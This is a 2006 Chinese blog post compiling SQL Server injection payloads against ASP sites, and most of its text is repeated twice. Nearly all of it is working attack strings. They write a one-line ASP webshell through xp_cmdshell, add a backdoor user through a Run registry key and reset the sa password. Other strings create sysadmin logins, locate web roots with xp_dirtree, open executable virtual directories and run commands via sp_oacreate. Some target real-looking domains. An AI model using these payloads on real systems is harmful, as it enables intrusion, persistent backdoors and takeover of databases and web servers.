作者: 雪飘 [VilCini]
来源: www.thysea.com www.vilcini.com
时间: 2006年5月21日
找了些网上的资料,并加了一些东西,如有错误希望高手斧正.
一、用^转义字符来写ASP(一句话木马)文件的方法:
192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
二、 显示SQL系统版本:
192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION);--
www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version);--
三、select * from mytable where id in(1)就相当与select * from mytable where id=1
四、判断xp_cmdshell扩展存储过程是否存在:
192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell');--
五、恢复xp_cmdshell扩展存储的命令:
www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
六、写入注册表:
192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add';--
七、 查看当前的数据库名称:
192.168.1.5/display.asp?keyno=188 and 0<>db_name(n);-- n改成0,1,2,3……就可以跨库了
www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name());--
八、列出当前所有的数据库名称:
select * from master.dbo.sysdatabases 列出所有列的记录
select name from master.dbo.sysdatabases 仅列出name列的记录
九、利用表内容导成文件功能
利用BCP命令把表中的内容导出形成ASP文件。
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,最终上传了一个runcommand.asp的木马)。
十、创建表、写入数据和删除表方法
创建表:
create table [dbo].[cyfd]([gyfd][char](255))
往表里写入入数据:
DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result)
删除临时表:
drop table cyfd
十一、通过SQL语句直接更改sa的密码:
update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,这样sa的密码就被我们改成了111111了
十二、添加和删除一个SA权限的用户:
exec master.dbo.sp_addlogin name,password
exec master.dbo.sp_addsrvrolemember name,password
十三、xp_regread读取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 获取WEB路径
(1) 新建一个表cyfd(字段为gyfd):http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255));--
(2) 把web路径写进去:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
(3) 还是让他不匹配,显示错误:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1);--
(4)接下来删除表:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
十四、利用SQL语句来查找WEB目录:
根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master.dbo.xp_dirtree(适合于public)生成的目录树,用以下语句:
create table temp(dir nvarchar(255),depth varchar(255)),该表的dir字段表示目录的名称,depth字段表示目录的深度。然后执行xp_dirtree获得D盘的目录树,语句如下:
insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:'
在进行下面的操作前,先查看D盘有几个文件夹,这样对D盘有个大致的了解,语句如下:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷'))>=数字(数字=0、1、2、3...)
接着,我们在对方的网站上找几个一级子目录,如user、photo,然后,用筛选的方法来判断WEB根目录上是否存在此盘上,语句如下:
(select count(*) from temp where dir<>'user')=1
看语句的返回结果,如果为真,表示WEB根目录有可能在此盘上,为了进一步确认,多测试几个子目录:
(select count(*) from temp where dir<>'photo')=1
...
如果所有的测试结果都为真,表示WEB根目录很有可能在此盘上。
下面假设找到的WEB根目录在此盘上,用以下的语句来获得一级子目录的深度:
(select depth from temp where dir='user')>=数字(数字=1、2、3...)
假设得到的depth是3,说明user目录是D盘的3级目录,则WEB根目录是D盘的二级目录。
目前我们已经知道了根目录所在的盘符和深度,要找到根目录的具体位置,我们来从D盘根目录开始逐一搜寻,当然,没有必要知道每个目录的名称,否则太耗费时间了。
接下来,另外建立一个临时表,用来存放D盘的1级子目录下的所有目录,语句如下:
create table temp1(dir nvarchar(255),depth varchar(255))
然后把从D盘的第一个子目录下的所有目录存到temp1中,语句如下:
declare @dirname varchar(255);set @dirname='d:'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的第二个子目录下的所有目录存到temp1中,只需把第二个top 1改为top 2就行了。
现在,temp1中已经保存了所有D盘第一级子目录下的所有目录,然后,我们用同样的方法来判断根目录是否在此一级子目录下:
(select count(*) from temp1 where dir<>'user')=1
如果返回为真,表示根目录可能在此子目录下,记住要多测试几个例子,如果都返回为假,则表明WEB根目录不在此目录下,然后我们在用同样的方法来获得D盘第2、3...个子目录下的所有目录列表,来判断WEB根目录是否在其下。但是,要注意,用xp_dirtree前一定要把temp1表中的内容删除。
现在假设,WEB根目录在D盘的第一级子目录下,该子目录名称为website,怎样获得这个目录的名称我想不用我说了吧。因为前面我们知道了WEB根目录的深度为2,我们需要知道website下到底哪个才是真正的WEB根目录。
现在,我们用同样的方法,再建立第3个临时表:
;create table temp2(dir nvarchar(255),depth varchar(255));--
然后把从D盘的website下的所有目录存到temp2中,语句如下:
declare @dirname varchar(255);set @dirname='d:\website'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的website下第二个子目录下的所有目录存到temp2中,只需把第二个top 1改为top 2就行了。
现在,我们用同样的方法判断该目录是否为根目录:
(select count(*) from temp2 where dir<>'user')=1
如果返回为真,为了确定我们的判断,多测试几个例子,方法上面都讲到了,如果多个例子都返回为真,那么就确定了该目录为WEB根目录。
用以上的方法基本上可以获得WEB根目录,现在我们假设WEB根目录是:D:\website\www
然后,我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空,然后C、D、E盘的目录树分别存到temp、temp1、temp2中。
十三、使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。
如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
十四、SQL注入建立虚拟目录,有dbo权限下找不到web绝对路径的一种解决办法:
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
1、建立虚拟目录win,指向c:\winnt\system32:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
2、让win目录具有解析asp脚本权限:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
上传到这个目录就可以访问了
3、删除虚拟目录win:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
十四、手工备份当前数据库:
完全备份:
declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT
差异备份:
declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT
十五、列出表
select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
就可以列出库ChouYFD中所有的用户建立的表名。
Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
十六、差异备份
create table [bdo].[jm_tmp].([cmd] [image]
declare @s sysname,@s nvarchar(4000) select @s=db_name(),@s=十六进制转换值 backup database @a to disk=@s
insert into [jm_tmp](cmd) values(十六进制转换值)
declare @a sysname,@s nvarchar(4000) select @a=db_name @s=十六进制转换值 backup database @a to disk=@s WITH DIFFERENTIAL,formAT
drop table [jm_tmp]
十七、sp_oacreate执行命令
declare @o int exec sp_oacreate 'wscript.shell',@o output exec sp_oamethod @o,'run',null,'cmd /c ping 127.0.0.1',0,true
来源: www.thysea.com www.vilcini.com
时间: 2006年5月21日
找了些网上的资料,并加了一些东西,如有错误希望高手斧正.
一、用^转义字符来写ASP(一句话木马)文件的方法:
192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
二、 显示SQL系统版本:
192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION);--
www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version);--
三、select * from mytable where id in(1)就相当与select * from mytable where id=1
四、判断xp_cmdshell扩展存储过程是否存在:
192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell');--
五、恢复xp_cmdshell扩展存储的命令:
www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
六、写入注册表:
192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add';--
七、 查看当前的数据库名称:
192.168.1.5/display.asp?keyno=188 and 0<>db_name(n);-- n改成0,1,2,3……就可以跨库了
www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name());--
八、列出当前所有的数据库名称:
select * from master.dbo.sysdatabases 列出所有列的记录
select name from master.dbo.sysdatabases 仅列出name列的记录
九、利用表内容导成文件功能
利用BCP命令把表中的内容导出形成ASP文件。
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,最终上传了一个runcommand.asp的木马)。
十、创建表、写入数据和删除表方法
创建表:
create table [dbo].[cyfd]([gyfd][char](255))
往表里写入入数据:
DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result)
删除临时表:
drop table cyfd
十一、通过SQL语句直接更改sa的密码:
update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,这样sa的密码就被我们改成了111111了
十二、添加和删除一个SA权限的用户:
exec master.dbo.sp_addlogin name,password
exec master.dbo.sp_addsrvrolemember name,password
十三、xp_regread读取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 获取WEB路径
(1) 新建一个表cyfd(字段为gyfd):http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255));--
(2) 把web路径写进去:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
(3) 还是让他不匹配,显示错误:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1);--
(4)接下来删除表:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
十四、利用SQL语句来查找WEB目录:
根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master.dbo.xp_dirtree(适合于public)生成的目录树,用以下语句:
create table temp(dir nvarchar(255),depth varchar(255)),该表的dir字段表示目录的名称,depth字段表示目录的深度。然后执行xp_dirtree获得D盘的目录树,语句如下:
insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:'
在进行下面的操作前,先查看D盘有几个文件夹,这样对D盘有个大致的了解,语句如下:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷'))>=数字(数字=0、1、2、3...)
接着,我们在对方的网站上找几个一级子目录,如user、photo,然后,用筛选的方法来判断WEB根目录上是否存在此盘上,语句如下:
(select count(*) from temp where dir<>'user')=1
看语句的返回结果,如果为真,表示WEB根目录有可能在此盘上,为了进一步确认,多测试几个子目录:
(select count(*) from temp where dir<>'photo')=1
...
如果所有的测试结果都为真,表示WEB根目录很有可能在此盘上。
下面假设找到的WEB根目录在此盘上,用以下的语句来获得一级子目录的深度:
(select depth from temp where dir='user')>=数字(数字=1、2、3...)
假设得到的depth是3,说明user目录是D盘的3级目录,则WEB根目录是D盘的二级目录。
目前我们已经知道了根目录所在的盘符和深度,要找到根目录的具体位置,我们来从D盘根目录开始逐一搜寻,当然,没有必要知道每个目录的名称,否则太耗费时间了。
接下来,另外建立一个临时表,用来存放D盘的1级子目录下的所有目录,语句如下:
create table temp1(dir nvarchar(255),depth varchar(255))
然后把从D盘的第一个子目录下的所有目录存到temp1中,语句如下:
declare @dirname varchar(255);set @dirname='d:'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的第二个子目录下的所有目录存到temp1中,只需把第二个top 1改为top 2就行了。
现在,temp1中已经保存了所有D盘第一级子目录下的所有目录,然后,我们用同样的方法来判断根目录是否在此一级子目录下:
(select count(*) from temp1 where dir<>'user')=1
如果返回为真,表示根目录可能在此子目录下,记住要多测试几个例子,如果都返回为假,则表明WEB根目录不在此目录下,然后我们在用同样的方法来获得D盘第2、3...个子目录下的所有目录列表,来判断WEB根目录是否在其下。但是,要注意,用xp_dirtree前一定要把temp1表中的内容删除。
现在假设,WEB根目录在D盘的第一级子目录下,该子目录名称为website,怎样获得这个目录的名称我想不用我说了吧。因为前面我们知道了WEB根目录的深度为2,我们需要知道website下到底哪个才是真正的WEB根目录。
现在,我们用同样的方法,再建立第3个临时表:
;create table temp2(dir nvarchar(255),depth varchar(255));--
然后把从D盘的website下的所有目录存到temp2中,语句如下:
declare @dirname varchar(255);set @dirname='d:\website'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的website下第二个子目录下的所有目录存到temp2中,只需把第二个top 1改为top 2就行了。
现在,我们用同样的方法判断该目录是否为根目录:
(select count(*) from temp2 where dir<>'user')=1
如果返回为真,为了确定我们的判断,多测试几个例子,方法上面都讲到了,如果多个例子都返回为真,那么就确定了该目录为WEB根目录。
用以上的方法基本上可以获得WEB根目录,现在我们假设WEB根目录是:D:\website\www
然后,我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空,然后C、D、E盘的目录树分别存到temp、temp1、temp2中。
十三、使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。
如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
十四、SQL注入建立虚拟目录,有dbo权限下找不到web绝对路径的一种解决办法:
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
1、建立虚拟目录win,指向c:\winnt\system32:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
2、让win目录具有解析asp脚本权限:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
上传到这个目录就可以访问了
3、删除虚拟目录win:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
十四、手工备份当前数据库:
完全备份:
declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT
差异备份:
declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT
十五、列出表
select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
就可以列出库ChouYFD中所有的用户建立的表名。
Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
十六、差异备份
create table [bdo].[jm_tmp].([cmd] [image]
declare @s sysname,@s nvarchar(4000) select @s=db_name(),@s=十六进制转换值 backup database @a to disk=@s
insert into [jm_tmp](cmd) values(十六进制转换值)
declare @a sysname,@s nvarchar(4000) select @a=db_name @s=十六进制转换值 backup database @a to disk=@s WITH DIFFERENTIAL,formAT
drop table [jm_tmp]
十七、sp_oacreate执行命令
declare @o int exec sp_oacreate 'wscript.shell',@o output exec sp_oamethod @o,'run',null,'cmd /c ping 127.0.0.1',0,true
回复Comments
{commenttime}{commentauthor}
{CommentUrl}
{commentcontent}